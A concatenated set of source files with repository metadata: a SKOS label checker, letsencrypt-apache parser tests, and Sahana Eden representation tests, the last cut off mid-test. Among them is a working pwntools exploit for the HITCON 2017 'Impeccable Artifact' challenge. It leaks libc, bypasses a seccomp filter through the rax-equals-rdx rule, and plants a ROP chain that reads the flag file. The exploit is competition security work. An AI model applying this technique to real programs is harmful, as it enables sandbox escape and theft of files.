for res, label in find_prop_overlap(rdf, SKOS.prefLabel, SKOS.altLabel):
label_warning(res, label, 'prefLabel', 'altLabel')
if fix:
rdf.remove((res, SKOS.altLabel, label))
for res, label in find_prop_overlap(rdf, SKOS.prefLabel, SKOS.hiddenLabel):
label_warning(res, label, 'prefLabel', 'hiddenLabel')
if fix:
rdf.remove((res, SKOS.hiddenLabel, label))
for res, label in find_prop_overlap(rdf, SKOS.altLabel, SKOS.hiddenLabel):
label_warning(res, label, 'altLabel', 'hiddenLabel')
if fix:
rdf.remove((res, SKOS.hiddenLabel, label))
|
NatLibFi/Skosify
|
skosify/check.py
|
Python
|
mit
| 8,938
| 0.000224
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
context(arch='amd64', os='linux', aslr=False, terminal=['tmux', 'neww'])
env = {'LD_PRELOAD': './libc.so.6'}
if args['GDB']:
io = gdb.debug(
'./artifact-amd64-2.24-9ubuntu2.2',
env=env,
gdbscript='''\
set follow-fork-mode parent
b *0x555555554ba6
c
''')
elf, libc = io.elf, ELF('libs/amd64/2.24/9ubuntu2.2/libc-2.24.so')
elif args['REMOTE']:
io = remote('52.192.178.153', 31337)
elf, libc = ELF('./artifact'), ELF('libs/amd64/2.24/9ubuntu2.2/libc-2.24.so')
else:
io = process('./artifact-amd64-2.24-9ubuntu2.2', env=env)
elf, libc = io.elf, ELF('libs/amd64/2.24/9ubuntu2.2/libc-2.24.so')
# the binary allows reading and writing to arbitrary locations
# the tricky part was finding how to bypass the seccomp rules
# enforced with prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, ...), since
# the "official" tool to disassemble BPF bytecode provided by libseccomp doesn't handle
# the BPF_X opcode correctly (and shows wrong rules)
# luckily, https://github.com/niklasb/dump-seccomp seems to extract the correct rules:
# prctl(PR_SET_NO_NEW_PRIVS)
# prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, ...)
# fprog @ 00007fffffffdd70
# 20 blocks @ 00007fffffffdd80
# Disassembly:
# l0: ld [4]
# l1: jeq #0xc000003e, l2, l18
# l2: ld [32]
# l3: tax
# l4: ld [0]
# l5: jeq #0, l19, l6
# l6: jeq #0x1, l19, l7
# l7: jeq #0x5, l19, l8
# l8: jeq #0x8, l19, l9
# l9: jeq #0x9, l11, l10
# l10: jeq #0xa, l11, l14
# l11: txa
# l12: and #0x1
# l13: jeq #0x1, l18, l19
# l14: jeq x, l19, l15
# l15: jeq #0xc, l19, l16
# l16: jeq #0x3c, l19, l17
# l17: jeq #0xe7, l19, l18
# l18: ret #0
# l19: ret #0x7fff0000
# at l14, syscalls in which rax == rdx are allowed to run: this means
# we can execute open(..., ..., 2)
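# (editorial note: on amd64, open is syscall number 2 and args[2] lands in rdx,
# so calling open(path, flags, 2) makes rax == rdx == 2 and passes the l14 rule)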
# find the address of libc
io.recvuntil('Choice?\n')
io.sendline('1')
io.recvuntil('Idx?\n')
index = 0x650 / 8 + 1
io.sendline(str(index))
a_libc_address = int(io.recvline()[len('Here it is: '):])
libc.address = a_libc_address - 0x0000000000020300 - 241
success('libc.address: %s' % hex(libc.address))
# find any writeable location
buf = libc.address + 0x3c1800
# read a filename into buf, open the file, read its content and write it back
rop = ROP(libc)
rop.read(0, buf, 5)
rop.open(buf, 0, 2)
rop.read(3, buf, 50)
rop.write(1, buf, 50)
# set up the ROP chain in the stack
raw_rop = str(rop)
for i, address in enumerate([u64(raw_rop[i:i + 8]) for i in range(0, len(raw_rop), 8)]):
print 'Sending', i
io.recvuntil('Choice?\n')
io.sendline('2')
io.recvuntil('Idx?\n')
index = 0x650 / 8 + 1 + i
io.sendline(str(index))
io.recvuntil('Give me your number:\n')
io.sendline(str(address))
# exit to trigger ROP execution
io.recvuntil('Choice?\n')
io.sendline('3')
sleep(0.1)
io.send('flag\x00')
io.interactive()
# $ ./artifact.py REMOTE
# [+] Opening connection to 52.192.178.153 on port 31337: Done
# [*] '/home/ubuntu/vbox/artifact-4c4375825c4a08ae9d14492b34b3bddd/artifact'
# Arch: amd64-64-little
# RELRO: Full RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
# [*] '/home/ubuntu/vbox/artifact-4c4375825c4a08ae9d14492b34b3bddd/libc.so.6'
# Arch: amd64-64-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
# [+] libc.address: 0x7fed4d6ab000
# [*] Loaded cached gadgets for './libc.so.6'
# Sending 0
# Sending 1
# . . .
# Sending 30
# Sending 31
# [*] Switching to interactive mode
# hitcon{why_libseccomp_cheated_me_Q_Q}
|
integeruser/on-pwning
|
2017-hitcon-quals/Impeccable-Artifact/artifact.py
|
Python
|
mit
| 3,733
| 0.001072
|
"""Tests for letsencrypt_apache.parser."""
import os
import shutil
import unittest
import augeas
import mock
from letsencrypt import errors
from letsencrypt_apache.tests import util
class BasicParserTest(util.ParserTest):
"""Apache Parser Test."""
def setUp(self): # pylint: disable=arguments-differ
super(BasicParserTest, self).setUp()
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.config_dir)
shutil.rmtree(self.work_dir)
def test_find_config_root_no_root(self):
# pylint: disable=protected-access
os.remove(self.parser.loc["root"])
self.assertRaises(
errors.NoInstallationError, self.parser._find_config_root)
def test_parse_file(self):
"""Test parse_file.
        letsencrypt.conf is chosen as the test file because it will not be
        included during the normal course of execution.
"""
file_path = os.path.join(
self.config_path, "not-parsed-by-default", "letsencrypt.conf")
self.parser._parse_file(file_path) # pylint: disable=protected-access
# search for the httpd incl
matches = self.parser.aug.match(
"/augeas/load/Httpd/incl [. ='%s']" % file_path)
self.assertTrue(matches)
def test_find_dir(self):
test = self.parser.find_dir("Listen", "80")
# This will only look in enabled hosts
test2 = self.parser.find_dir("documentroot")
self.assertEqual(len(test), 1)
self.assertEqual(len(test2), 4)
def test_add_dir(self):
aug_default = "/files" + self.parser.loc["default"]
self.parser.add_dir(aug_default, "AddDirective", "test")
self.assertTrue(
self.parser.find_dir("AddDirective", "test", aug_default))
self.parser.add_dir(aug_default, "AddList", ["1", "2", "3", "4"])
matches = self.parser.find_dir("AddList", None, aug_default)
for i, match in enumerate(matches):
self.assertEqual(self.parser.aug.get(match), str(i + 1))
def test_add_dir_to_ifmodssl(self):
"""test add_dir_to_ifmodssl.
Path must be valid before attempting to add to augeas
"""
from letsencrypt_apache.parser import get_aug_path
# This makes sure that find_dir will work
self.parser.modules.add("mod_ssl.c")
self.parser.add_dir_to_ifmodssl(
get_aug_path(self.parser.loc["default"]),
"FakeDirective", ["123"])
matches = self.parser.find_dir("FakeDirective", "123")
self.assertEqual(len(matches), 1)
self.assertTrue("IfModule" in matches[0])
def test_add_dir_to_ifmodssl_multiple(self):
from letsencrypt_apache.parser import get_aug_path
# This makes sure that find_dir will work
self.parser.modules.add("mod_ssl.c")
self.parser.add_dir_to_ifmodssl(
get_aug_path(self.parser.loc["default"]),
"FakeDirective", ["123", "456", "789"])
matches = self.parser.find_dir("FakeDirective")
self.assertEqual(len(matches), 3)
self.assertTrue("IfModule" in matches[0])
def test_get_aug_path(self):
from letsencrypt_apache.parser import get_aug_path
self.assertEqual("/files/etc/apache", get_aug_path("/etc/apache"))
def test_set_locations(self):
with mock.patch("letsencrypt_apache.parser.os.path") as mock_path:
mock_path.isfile.side_effect = [False, False]
# pylint: disable=protected-access
results = self.parser._set_locations()
self.assertEqual(results["default"], results["listen"])
self.assertEqual(results["default"], results["name"])
@mock.patch("letsencrypt_apache.parser.ApacheParser._get_runtime_cfg")
def test_update_runtime_variables(self, mock_cfg):
mock_cfg.return_value = (
'ServerRoot: "/etc/apache2"\n'
'Main DocumentRoot: "/var/www"\n'
'Main ErrorLog: "/var/log/apache2/error.log"\n'
'Mutex ssl-stapling: using_defaults\n'
'Mutex ssl-cache: using_defaults\n'
'Mutex default: dir="/var/lock/apache2" mechanism=fcntl\n'
'Mutex watchdog-callback: using_defaults\n'
'PidFile: "/var/run/apache2/apache2.pid"\n'
'Define: TEST\n'
'Define: DUMP_RUN_CFG\n'
'Define: U_MICH\n'
'Define: TLS=443\n'
'Define: example_path=Documents/path\n'
'User: name="www-data" id=33 not_used\n'
'Group: name="www-data" id=33 not_used\n'
)
expected_vars = {"TEST": "", "U_MICH": "", "TLS": "443",
"example_path": "Documents/path"}
self.parser.update_runtime_variables()
self.assertEqual(self.parser.variables, expected_vars)
@mock.patch("letsencrypt_apache.parser.ApacheParser._get_runtime_cfg")
def test_update_runtime_vars_bad_output(self, mock_cfg):
mock_cfg.return_value = "Define: TLS=443=24"
self.parser.update_runtime_variables()
mock_cfg.return_value = "Define: DUMP_RUN_CFG\nDefine: TLS=443=24"
self.assertRaises(
errors.PluginError, self.parser.update_runtime_variables)
@mock.patch("letsencrypt_apache.constants.os_constant")
@mock.patch("letsencrypt_apache.parser.subprocess.Popen")
def test_update_runtime_vars_bad_ctl(self, mock_popen, mock_const):
mock_popen.side_effect = OSError
mock_const.return_value = "nonexistent"
self.assertRaises(
errors.MisconfigurationError,
self.parser.update_runtime_variables)
@mock.patch("letsencrypt_apache.parser.subprocess.Popen")
def test_update_runtime_vars_bad_exit(self, mock_popen):
mock_popen().communicate.return_value = ("", "")
mock_popen.returncode = -1
self.assertRaises(
errors.MisconfigurationError,
self.parser.update_runtime_variables)
class ParserInitTest(util.ApacheTest):
def setUp(self): # pylint: disable=arguments-differ
super(ParserInitTest, self).setUp()
self.aug = augeas.Augeas(
flags=augeas.Augeas.NONE | augeas.Augeas.NO_MODL_AUTOLOAD)
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.config_dir)
shutil.rmtree(self.work_dir)
@mock.patch("letsencrypt_apache.parser.ApacheParser._get_runtime_cfg")
def test_unparsable(self, mock_cfg):
from letsencrypt_apache.parser import ApacheParser
mock_cfg.return_value = ('Define: TEST')
self.assertRaises(
errors.PluginError,
ApacheParser, self.aug, os.path.relpath(self.config_path),
"/dummy/vhostpath", version=(2, 2, 22))
def test_root_normalized(self):
from letsencrypt_apache.parser import ApacheParser
with mock.patch("letsencrypt_apache.parser.ApacheParser."
"update_runtime_variables"):
path = os.path.join(
self.temp_dir,
"debian_apache_2_4/////multiple_vhosts/../multiple_vhosts/apache2")
parser = ApacheParser(self.aug, path,
"/dummy/vhostpath")
self.assertEqual(parser.root, self.config_path)
def test_root_absolute(self):
from letsencrypt_apache.parser import ApacheParser
with mock.patch("letsencrypt_apache.parser.ApacheParser."
"update_runtime_variables"):
parser = ApacheParser(
self.aug, os.path.relpath(self.config_path),
"/dummy/vhostpath")
self.assertEqual(parser.root, self.config_path)
def test_root_no_trailing_slash(self):
from letsencrypt_apache.parser import ApacheParser
with mock.patch("letsencrypt_apache.parser.ApacheParser."
"update_runtime_variables"):
parser = ApacheParser(
self.aug, self.config_path + os.path.sep,
"/dummy/vhostpath")
self.assertEqual(parser.root, self.config_path)
if __name__ == "__main__":
unittest.main() # pragma: no cover
|
mitnk/letsencrypt
|
letsencrypt-apache/letsencrypt_apache/tests/parser_test.py
|
Python
|
apache-2.0
| 8,205
| 0.000122
|
# -*- coding: utf-8 -*-
#
# s3fields unit tests
#
# To run this script use:
# python web2py.py -S eden -M -R applications/eden/modules/unit_tests/s3/s3fields.py
#
import unittest
from gluon.languages import lazyT
from gluon.dal import Query
from s3.s3fields import *
# =============================================================================
class S3RepresentTests(unittest.TestCase):
# -------------------------------------------------------------------------
def setUp(self):
T = current.T
self.test_opts = {
1: "Test1",
2: "Test2",
3: "Test3"
}
current.auth.override = True
s3db = current.s3db
otable = s3db.org_organisation
org1 = Storage(name="Represent Test Organisation1")
org1_id = otable.insert(**org1)
org1.update(id=org1_id)
s3db.update_super(otable, org1)
org2 = Storage(name="Represent Test Organisation2")
org2_id = otable.insert(**org2)
org2.update(id=org2_id)
s3db.update_super(otable, org2)
self.id1 = org1_id
self.id2 = org2_id
self.name1 = org1.name
self.name2 = org2.name
# -------------------------------------------------------------------------
def testSetup(self):
""" Check lazy setup method """
# Check for options
r = S3Represent(options=self.test_opts)
self.assertFalse(r.setup)
r._setup()
self.assertTrue(r.setup)
self.assertEqual(r.tablename, None)
self.assertEqual(r.options, self.test_opts)
# Check for lookups
r = S3Represent(lookup="org_organisation")
self.assertFalse(r.setup)
self.assertEqual(r.options, None)
self.assertEqual(r.tablename, "org_organisation")
self.assertEqual(r.key, None)
self.assertEqual(r.fields, None)
self.assertEqual(r.labels, None)
self.assertEqual(r.table, None)
r._setup()
self.assertTrue(r.setup)
self.assertEqual(r.options, None)
self.assertEqual(r.tablename, "org_organisation")
self.assertEqual(r.key, "id")
self.assertEqual(r.fields, ["name"])
self.assertEqual(r.labels, None)
self.assertEqual(r.table, current.db.org_organisation)
# -------------------------------------------------------------------------
def testOptions(self):
""" Test option field representation """
r = S3Represent(options=self.test_opts, none="NONE")
# Standard variants
self.assertEqual(r(1), "Test1")
self.assertEqual(r.multiple([1,2,3]), "Test1, Test2, Test3")
self.assertEqual(r.bulk([1,2,3]),
{
1: "Test1",
2: "Test2",
3: "Test3",
None: "NONE",
}
)
# list:type
r = S3Represent(options=self.test_opts,
none="NONE", multiple=True)
# Should work with both, single value and list
self.assertEqual(r(1), "Test1")
self.assertEqual(r([1,2]), "Test1, Test2")
        # multiple() always expects a list of lists
self.assertRaises(ValueError, r.multiple, [1,2,3])
# Check multiple with list:type
result = r.multiple([[1,2]]).split(", ")
self.assertTrue("Test1" in result)
self.assertTrue("Test2" in result)
self.assertEqual(len(result), 2)
# Check that multiple with list:type de-duplicates properly
result = r.multiple([[1,2], [2,3]]).split(", ")
self.assertTrue("Test1" in result)
self.assertTrue("Test2" in result)
self.assertTrue("Test3" in result)
self.assertEqual(len(result), 3)
# Check bulk with list:type
result = r.bulk([[1,2], [2,3]])
self.assertEqual(len(result), 4)
self.assertTrue(1 in result)
self.assertEqual(result[1], "Test1")
self.assertTrue(2 in result)
self.assertEqual(result[2], "Test2")
self.assertTrue(3 in result)
self.assertEqual(result[3], "Test3")
self.assertTrue(None in result)
self.assertEqual(result[None], "NONE")
# -------------------------------------------------------------------------
def testForeignKeys(self):
""" Test foreign key lookup representation """
r = S3Represent(lookup="org_organisation")
# Check lookup value by value
self.assertEqual(r(self.id1), self.name1)
self.assertEqual(r(self.id2), self.name2)
self.assertEqual(r.queries, 2)
# Check lookup of multiple values
self.assertEqual(r.multiple([self.id1, self.id2]),
"%s, %s" % (self.name1, self.name2))
# Should not have needed any additional queries
self.assertEqual(r.queries, 2)
# Check bulk lookup
result = r.bulk([self.id1, self.id2])
self.assertTrue(len(result), 3)
self.assertEqual(result[self.id1], self.name1)
self.assertEqual(result[self.id2], self.name2)
self.assertTrue(None in result)
# Should still not have needed any additional queries
self.assertEqual(r.queries, 2)
# Check that only one query is used for multiple values
r = S3Represent(lookup="org_organisation")
result = r.bulk([self.id1, self.id2])
self.assertTrue(len(result), 3)
self.assertEqual(r.queries, 1)
# Check translation
r = S3Represent(lookup="org_organisation", translate=True)
result = r(self.id1)
self.assertTrue(isinstance(result, lazyT))
self.assertEqual(result, current.T(self.name1))
def testRowsPrecedence(self):
# Check that rows get preferred over values
r = S3Represent(lookup="org_organisation")
otable = current.s3db.org_organisation
org1 = otable[self.id1]
org2 = otable[self.id2]
# Test single value
self.assertEqual(r(None, row=org1), self.name1)
self.assertEqual(r(self.id2, row=org1), self.name1)
# Test multiple
result = r.multiple(None, rows=[org1, org2])
self.assertTrue(isinstance(result, basestring))
self.assertTrue(", " in result)
result = result.split(", ")
self.assertEqual(len(result), 2)
self.assertTrue(self.name1 in result)
self.assertTrue(self.name2 in result)
result = r.multiple([self.id1], rows=[org1, org2])
self.assertTrue(isinstance(result, basestring))
self.assertTrue(", " in result)
result = result.split(", ")
self.assertEqual(len(result), 2)
self.assertTrue(self.name1 in result)
self.assertTrue(self.name2 in result)
# Test bulk
result = r.bulk(None, rows=[org1, org2])
self.assertTrue(len(result), 3)
self.assertEqual(result[self.id1], self.name1)
self.assertEqual(result[self.id2], self.name2)
self.assertTrue(None in result)
result = r.bulk([self.id1], rows=[org1, org2])
self.assertTrue(len(result), 3)
self.assertEqual(result[self.id1], self.name1)
self.assertEqual(result[self.id2], self.name2)
self.assertTrue(None in result)
# -------------------------------------------------------------------------
def testListReference(self):
""" Test Foreign Key Representation in list:reference types """
r = S3Represent(lookup="org_organisation",
multiple=True,
#linkto=URL(c="org", f="organisation", args=["[id]"]),
show_link=True)
a = current.request.application
# Single value gives a single result
result = r(self.id1)
self.assertTrue(isinstance(result, DIV))
self.assertEqual(len(result), 1)
self.assertTrue(isinstance(result[0], A))
self.assertEqual(result[0].attributes["_href"],
"/%s/org/organisation/%s" % (a, self.id1))
self.assertEqual(result[0].components[0],
"Represent Test Organisation1")
# Test with show_link=False
result = r(self.id1, show_link=False)
self.assertEqual(result, self.name1)
# List value gives a comma-separated list
result = r([self.id1, self.id2], show_link=False).split(", ")
self.assertEqual(len(result), 2)
self.assertTrue(self.name1 in result)
self.assertTrue(self.name2 in result)
values = [[self.id1, self.id2], [self.id2], [None, self.id1]]
# Multiple lists give a comma-separated list of unique values
result = r.multiple(values, show_link=False).split(", ")
self.assertEqual(len(result), 3)
self.assertTrue(self.name1 in result)
self.assertTrue(self.name2 in result)
self.assertTrue(current.messages.NONE in result)
# Bulk representation gives a dict of all unique values
result = r.bulk(values, show_link=False)
self.assertTrue(isinstance(result, dict))
self.assertEqual(len(result), 3)
self.assertEqual(result[self.id1], self.name1)
self.assertEqual(result[self.id2], self.name2)
self.assertTrue(None in result)
# Test render_list method
repr1 = r.render_list(values[0], result, show_link=False)
self.assertEqual(repr1, ", ".join([self.name1, self.name2]))
repr2 = r.render_list(values[1], result, show_link=False)
self.assertEqual(repr2, self.name2)
# Test render_list with show_link
result = r.bulk(values)
repr1 = r.render_list(values[0], result)
self.assertTrue(isinstance(repr1, DIV))
self.assertEqual(len(repr1), 3)
self.assertTrue(isinstance(repr1[0], A))
self.assertEqual(repr1[0].attributes["_href"],
"/%s/org/organisation/%s" % (a, self.id1))
self.assertEqual(repr1[0].components[0],
"Represent Test Organisation1")
self.assertEqual(repr1[1], ", ")
self.assertTrue(isinstance(repr1[2], A))
self.assertEqual(repr1[2].attributes["_href"],
"/%s/org/organisation/%s" % (a, self.id2))
self.assertEqual(repr1[2].components[0],
"Represent Test Organisation2")
# Check NONE-option
repr2 = r.render_list(values[2], result)
self.assertTrue(isinstance(repr2, DIV))
self.assertEqual(len(repr2), 3)
self.assertEqual(str(repr2[0]), str(current.messages.NONE))
# Check representation of None and empty lists
self.assertEqual(r(None, show_link=False), str(current.messages.NONE))
self.assertEqual(r([]), str(current.messages.NONE))
self.assertEqual(r.multiple([None], show_link=False), str(current.messages.NONE))
self.assertEqual(r.multiple([[]], show_link=False), str(current.messages.NONE))
# All that should have taken exactly 2 queries!
self.assertEqual(r.queries, 2)
# -------------------------------------------------------------------------
def tearDown(self):
current.db.rollback()
current.auth.override = False
# =============================================================================
class S3ExtractLazyFKRepresentationTests(unittest.TestCase):
""" Test lazy representation of foreign keys in datatables """
tablename = "export_lazy_fk_represent"
# -------------------------------------------------------------------------
@classmethod
def setUpClass(cls):
db = current.db
db.define_table(cls.tablename,
Field("location_id",
"reference gis_location"),
Field("organisation_id",
"reference org_organisation"),
Field("facility_type_id",
"list:reference org_facility_type"),
*s3_meta_fields())
# -------------------------------------------------------------------------
def setUp(self):
tablename = self.tablename
s3db = current.s3db
table = s3db[tablename]
s3db.add_components("org_organisation",
**{tablename: {"name": "test",
"joinby": "organisation_id",
},
}
)
current.auth.override = True
# Create locations
locations = (Storage(name="FK Represent TestLocation 1"),
Storage(name="FK Represent TestLocation 2"))
ltable = s3db.gis_location
for i in xrange(len(locations)):
location = locations[i]
location_id = ltable.insert(**location)
location["id"] = location_id
self.locations = locations
# Create facility types
fac_types = (Storage(name="FK Represent TestFacType P"),
Storage(name="FK Represent TestFacType Q"),
Storage(name="FK Represent TestFacType R"))
ttable = s3db.org_facility_type
for i in xrange(len(fac_types)):
fac_type = fac_types[i]
fac_type_id = ttable.insert(**fac_type)
fac_type["id"] = fac_type_id
self.fac_types = fac_types
# Create organisation
org = Storage(name="FK Represent TestOrg A")
otable = s3db.org_organisation
org_id = otable.insert(**org)
org["id"] = org_id
s3db.update_super(otable, org)
self.org = org
# Create test records
facs = (Storage(organisation_id=org.id,
facility_type_id=[fac_types[0].id, fac_types[1].id],
location_id=locations[0].id),
Storage(organisation_id=org.id,
facility_type_id=[fac_types[1].id, fac_types[2].id],
location_id=locations[1].id))
for i in xrange(len(facs)):
fac = facs[i]
fac_id = table.insert(**fac)
fac["id"] = fac_id
self.facs = facs
# -------------------------------------------------------------------------
def testRepresentReferenceSingleNoLinkto(self):
"""
Test Representation of reference, single value,
without linkto
"""
s3db = current.s3db
tablename = self.tablename
fname = "%s.organisation_id" % tablename
fac = self.facs[0]
resource = s3db.resource(tablename, id=fac.id)
renderer = S3Represent(lookup="org_organisation")
table = resource.table
table.organisation_id.represent = renderer
data = resource.select(["id", "organisation_id"],
limit=None,
represent=True)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(isinstance(result, list))
self.assertEqual(len(result), 1)
output = result[0]
self.assertTrue(isinstance(output, Storage))
self.assertTrue(fname in output)
self.assertEqual(output[fname], self.org.name)
# -------------------------------------------------------------------------
def testRepresentReferenceSingleLinktoOn(self):
"""
Test Representation of reference, single value,
with linkto
"""
s3db = current.s3db
tablename = self.tablename
fname = "%s.organisation_id" % tablename
fac = self.facs[0]
resource = s3db.resource(tablename, id=fac.id)
renderer = S3Represent(lookup="org_organisation",
#linkto=URL(c="org", f="organisation", args=["[id]"]),
show_link=True)
table = resource.table
table.organisation_id.represent = renderer
data = resource.select(["id", "organisation_id"],
limit=None,
represent=True)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(isinstance(result, list))
self.assertEqual(len(result), 1)
output = result[0]
self.assertTrue(isinstance(output, Storage))
self.assertTrue(fname in output)
representation = output[fname]
self.assertTrue(isinstance(representation, A))
self.assertEqual(representation.attributes["_href"],
"/%s/org/organisation/%s" %
(current.request.application, self.org.id))
self.assertEqual(representation.components[0],
self.org.name)
# -------------------------------------------------------------------------
def testRepresentReferenceSingleLinktoOff(self):
"""
Test Representation of reference, single value,
with linkto + show_link=False
"""
s3db = current.s3db
tablename = self.tablename
fname = "%s.organisation_id" % tablename
fac = self.facs[0]
resource = s3db.resource(tablename, id=fac.id)
renderer = S3Represent(lookup="org_organisation",
linkto=URL(c="org", f="organisation", args=["[id]"]))
table = resource.table
table.organisation_id.represent = renderer
data = resource.select(["id", "organisation_id"],
limit=None,
represent=True,
show_links=False)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(isinstance(result, list))
self.assertEqual(len(result), 1)
output = result[0]
self.assertTrue(isinstance(output, Storage))
self.assertTrue(fname in output)
self.assertEqual(output[fname], self.org.name)
# -------------------------------------------------------------------------
def testRepresentReferenceMultipleNoLinkto(self):
"""
Test Representation of reference, multiple values,
without linkto
"""
s3db = current.s3db
tablename = self.tablename
fname = "%s.location_id" % tablename
ftable = current.db[tablename]
renderer = S3Represent(lookup="gis_location")
ftable.location_id.represent = renderer
resource = s3db.resource("org_organisation", id=self.org.id)
data = resource.select(["id", "test.location_id"],
limit=None,
represent=True)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(len(result), 1)
output = result[0]
self.assertTrue(fname in output)
names = output[fname].split(", ")
self.assertEqual(len(names), 2)
self.assertTrue(self.locations[0].name in names)
self.assertTrue(self.locations[1].name in names)
# -------------------------------------------------------------------------
def testRepresentReferenceMultipleLinktoOn(self):
"""
Test Representation of reference, multiple values,
with linkto
"""
s3db = current.s3db
tablename = self.tablename
fname = "%s.location_id" % tablename
ftable = current.db[tablename]
renderer = S3Represent(lookup="gis_location",
#linkto=URL(c="gis", f="location", args=["[id]"]),
show_link=True)
ftable.location_id.represent = renderer
resource = s3db.resource("org_organisation", id=self.org.id)
data = resource.select(["id", "name", "test.location_id"],
limit=None,
represent=True)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(len(result), 1)
output = result[0]
self.assertTrue(fname in output)
names = output[fname]
self.assertTrue(isinstance(names, DIV))
from lxml import etree
tree = etree.fromstring("<div>%s</div>" % names)
links = tree.findall("a")
self.assertEqual(len(links), 2)
appname = current.request.application
a = lambda location: (location.name,
"/%s/gis/location/%s" % (appname, location.id))
types = dict(a(location) for location in self.locations)
for link in links:
name = link.text
self.assertTrue(name in types)
self.assertEqual(link.get("href", None),
types[name])
# -------------------------------------------------------------------------
def testRepresentReferenceMultipleLinktoOff(self):
"""
Test Representation of reference, multiple values,
with linkto + show_link=False
"""
s3db = current.s3db
tablename = self.tablename
fname = "%s.location_id" % tablename
ftable = current.db[tablename]
renderer = S3Represent(lookup="gis_location",
linkto=URL(c="gis", f="location", args=["[id]"]))
ftable.location_id.represent = renderer
resource = s3db.resource("org_organisation", id=self.org.id)
data = resource.select(["id", "name", "test.location_id"],
limit=None,
represent=True,
show_links=False)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(len(result), 1)
output = result[0]
self.assertTrue(fname in output)
names = output[fname].split(", ")
self.assertEqual(len(names), 2)
self.assertTrue(self.locations[0].name in names)
self.assertTrue(self.locations[1].name in names)
# -------------------------------------------------------------------------
def testRepresentListReferenceSingleNoLinkto(self):
"""
Test Representation of list:reference, single value,
without linkto
"""
s3db = current.s3db
tablename = self.tablename
fname = "%s.facility_type_id" % tablename
fac = self.facs[0]
resource = s3db.resource(tablename, id=fac.id)
renderer = S3Represent(lookup="org_facility_type",
multiple=True)
table = resource.table
table.facility_type_id.represent = renderer
data = resource.select(["id", "facility_type_id"],
limit=None,
represent=True)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(isinstance(result, list))
self.assertEqual(len(result), 1)
output = result[0]
self.assertTrue(isinstance(output, Storage))
self.assertTrue(fname in output)
representation = output[fname].split(", ")
self.assertEqual(len(representation), 2)
self.assertTrue(self.fac_types[0].name in representation)
self.assertTrue(self.fac_types[1].name in representation)
# -------------------------------------------------------------------------
def testRepresentListReferenceSingleLinktoOn(self):
"""
Test Representation of list:reference, single value,
with linkto
"""
s3db = current.s3db
tablename = self.tablename
fname = "%s.facility_type_id" % tablename
fac = self.facs[0]
resource = s3db.resource(tablename, id=fac.id)
renderer = S3Represent(lookup="org_facility_type",
multiple=True,
#linkto=URL(c="org", f="facility_type", args=["[id]"]),
show_link=True)
table = resource.table
table.facility_type_id.represent = renderer
data = resource.select(["id", "facility_type_id"],
limit=None,
represent=True)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(isinstance(result, list))
self.assertEqual(len(result), 1)
output = result[0]
self.assertTrue(isinstance(output, Storage))
self.assertTrue(fname in output)
names = output[fname]
self.assertTrue(isinstance(names, DIV))
from lxml import etree
tree = etree.fromstring("<div>%s</div>" % names)
links = tree.findall("a")
self.assertEqual(len(links), 2)
appname = current.request.application
a = lambda fac_type: (fac_type.name,
"/%s/org/facility_type/%s" % (appname, fac_type.id))
types = dict(a(fac_type) for fac_type in self.fac_types)
for link in links:
name = link.text
self.assertTrue(name in types)
self.assertEqual(link.get("href", None),
types[name])
# -------------------------------------------------------------------------
def testRepresentListReferenceSingleLinktoOff(self):
"""
Test Representation of list:reference, single value,
with linkto + show_link=False
"""
s3db = current.s3db
tablename = self.tablename
fname = "%s.facility_type_id" % tablename
fac = self.facs[0]
resource = s3db.resource(tablename, id=fac.id)
renderer = S3Represent(lookup="org_facility_type",
multiple=True,
linkto=URL(c="org", f="facility_type", args=["[id]"]))
table = resource.table
table.facility_type_id.represent = renderer
data = resource.select(["id", "facility_type_id"],
limit=None,
represent=True,
show_links=False)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(isinstance(result, list))
self.assertEqual(len(result), 1)
output = result[0]
self.assertTrue(isinstance(output, Storage))
self.assertTrue(fname in output)
representation = output[fname].split(", ")
self.assertEqual(len(representation), 2)
self.assertTrue(self.fac_types[0].name in representation)
self.assertTrue(self.fac_types[1].name in representation)
# -------------------------------------------------------------------------
def testRepresentListReferenceMultipleNoLinkto(self):
"""
Test Representation of list:reference, multiple values,
without linkto
"""
s3db = current.s3db
tablename = self.tablename
fname = "%s.location_id" % tablename
ftable = current.db[tablename]
renderer = S3Represent(lookup="gis_location",
linkto=URL(c="gis", f="location", args=["[id]"]))
ftable.location_id.represent = renderer
resource = s3db.resource("org_organisation", id=self.org.id)
data = resource.select(["id", "name", "test.location_id"],
limit=None,
represent=True,
show_links=False)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(len(result), 1)
output = result[0]
self.assertTrue(fname in output)
names = output[fname].split(", ")
self.assertEqual(len(names), 2)
self.assertTrue(self.locations[0].name in names)
self.assertTrue(self.locations[1].name in names)
# -------------------------------------------------------------------------
    def testRepresentListReferenceMultipleValuesNoLinkto(self):
        """
            Test Representation of list:reference, multiple values
            (via component), without linkto
        """
s3db = current.s3db
tablename = self.tablename
fname = "%s.facility_type_id" % tablename
ftable = current.db[tablename]
renderer = S3Represent(lookup="org_facility_type",
multiple=True)
ftable.facility_type_id.represent = renderer
org = self.org
resource = s3db.resource("org_organisation", id=org.id)
data = resource.select(["id", "test.facility_type_id"],
limit=None,
represent=True)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(isinstance(result, list))
self.assertEqual(len(result), 1)
output = result[0]
self.assertTrue(isinstance(output, Storage))
self.assertTrue(fname in output)
representation = output[fname].split(", ")
self.assertEqual(len(representation), 3)
self.assertTrue(self.fac_types[0].name in representation)
